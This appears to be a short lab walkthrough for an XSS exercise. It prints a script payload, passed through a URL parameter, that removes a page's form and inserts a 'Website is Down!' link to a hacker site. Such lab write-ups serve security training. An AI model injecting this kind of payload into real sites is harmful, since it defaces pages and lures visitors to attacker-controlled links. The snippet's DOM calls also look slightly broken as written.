Task 5: Social Engineering | Task Link
In this task, we have to do some social engineering with XSS. This task is pretty simple, you have to just remove the form element and add a new element with text as “Website is Down! Please visit SecurityTube.net”.
To complete the task we have to start by investigating the source code, where we have to find our target area and that is form tag. Copy and URL-encode the code provided below and paste it after the url parameter in the URL bar
<script> var frmcon = document.forms; frmcon.parentNode.removeChild(frmcon); var a = document.createElement('A'); atxt = document.createTextNode('Website is Down! Please visit SecurityTube.net'); a.setAttribute("href", "http://www.the-hacker-site.com"); a.appendChild(atxt); document.getElementsByTagName('div').appendChild(a); </script>
First two lines of code will remove the form element and next four lines will create a new element, in my case I create an anchor or link with <a> tag and assign it a string value ‘Website is Down! Please visit SecurityTube.net’ and link to some hackers site. The last line will go and append the newly created child to the fourth div element (manually figured).
Replacement of form child node with another does not seem to work for me, maybe browser issues, that is why I create a new child node and append it to the div tag.